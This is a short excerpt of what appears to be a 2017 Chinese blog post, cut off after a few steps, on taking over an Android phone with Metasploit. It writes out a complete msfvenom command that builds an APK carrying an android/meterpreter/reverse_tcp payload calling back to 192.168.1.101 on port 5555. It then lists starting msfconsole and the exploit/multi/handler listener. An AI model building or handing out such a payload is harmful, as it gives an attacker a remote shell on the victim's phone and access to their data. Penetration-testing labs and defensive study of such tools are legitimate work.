摘要: 1.生成apk程序 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 R > apk.apk 2.启动msfconsole 3.启动use exploit/multi/handler模块 4.set 阅读全文
posted @ 2017-06-27 22:43 Jimny 阅读(3426) 评论(2) 推荐(0) 编辑